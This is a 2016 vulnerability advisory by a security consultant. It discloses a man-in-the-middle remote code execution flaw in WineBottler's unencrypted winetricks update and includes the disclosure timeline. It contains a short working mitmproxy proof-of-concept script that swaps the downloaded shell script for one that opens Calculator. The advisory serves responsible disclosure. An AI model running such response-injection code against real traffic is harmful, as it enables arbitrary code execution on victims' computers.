Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE : product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media-players, games or business applications snugly into Mac app-bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man in the middle remote code execution vulnerability.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surfe.

PoC
===================================================
1.) Setup an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script.
5.) Remote code execution has been gained!

The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack:
from mitmproxy.models import decoded

NEWLINE = '\r\n'

def response(context, flow):
    if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == 301 and flow.request.method=="GET":
        flow.response.status_code=200 # overwrite 301 status code to 200

        with decoded(flow.response):  # automatically decode gzipped responses.
            flow.response.content =  "" # replace original script to launch Calculator.app
            flow.response.content += '#!/bin/sh'+NEWLINE
            flow.response.content += '/usr/bin/open /Applications/Calculator.app'

Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; Retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: The product is not covered.
2.6.2016: Created this documentation; Sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released a no success
29.7.2016: Initially agreed public disclosure date a rescheduled
31.7.2016: Tried again to contact developer a again no success.
13.8.2016: Tried a last time to get in touch with the developer a again no success
17.10.2016: Public disclosure altough unfixed: Developer unresponsive since several month

Suggested Solution
===================================================
All request should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planing to do so in the future. Yet, right now there is no patch available.

The only workaround would be to block outgoing (HTTP) connections - However, whenever I tried that WineBottler stalled...


Florian Bogner | Security Solutions
ICT Technology Solutions
Telefon Mobil +43 664 628 5491 | florian.bogner@kapsch.net<mailto:florian.bogner@kapsch.net>

Kapsch BusinessCom AG | Wienerbergstrasse 53 | 1120 Wien | Asterreich
www.kapschbusiness.com<http://www.kapschbusiness.com/> | www.kapsch.net
Firmenbuch HG Wien FN 178368g | Firmensitz Wien

<http://www.kapschbusiness.com/>
<http://www.kapsch.net/kbc/Events/EventItems/Kapsch-Security-Day-2016>[cid:image001.jpg@01D0CDEE.D0D64C00]
<http://www.kapschbusiness.com/>
<http://www.kapschbusiness.com/>




The information contained in this e-mail message is privileged and confidential and is for the exclusive use of the addressee. The person who receives this message and who is not the addressee, one of his employees or an agent entitled to hand it over to the addressee, is informed that he may not use, disclose or reproduce the contents thereof, and is kindly asked to notify the sender and delete the e-mail immediately.